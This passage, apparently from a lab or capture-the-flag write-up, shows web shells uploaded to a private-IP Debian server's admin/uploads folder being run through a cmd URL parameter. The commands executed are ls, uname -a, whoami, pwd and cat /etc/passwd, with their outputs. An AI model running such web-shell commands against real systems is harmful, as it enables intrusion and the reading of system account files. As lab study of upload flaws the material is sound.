Inspecting the page elements shows that the image path is admin/uploads.

- `http://192.168.128.128/admin/uploads/test1.php3?cmd=ls`: cthulhu.png hacker.png ruby.jpg test1.php3 test2.php.aaa
- `http://192.168.128.128/admin/uploads/test1.php3?cmd=uname%20-a`: Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
- `http://192.168.128.128/admin/uploads/test1.php3?cmd=whoami`: www-data
- `http://192.168.128.128/admin/uploads/test2.php.aaa?cmd=pwd`: /var/www/admin/uploads
- `http://192.168.128.128/admin/uploads/test2.php.aaa?cmd=cat%20/etc/passwd`: (output: the contents of /etc/passwd, from root through the Debian Live "user" account)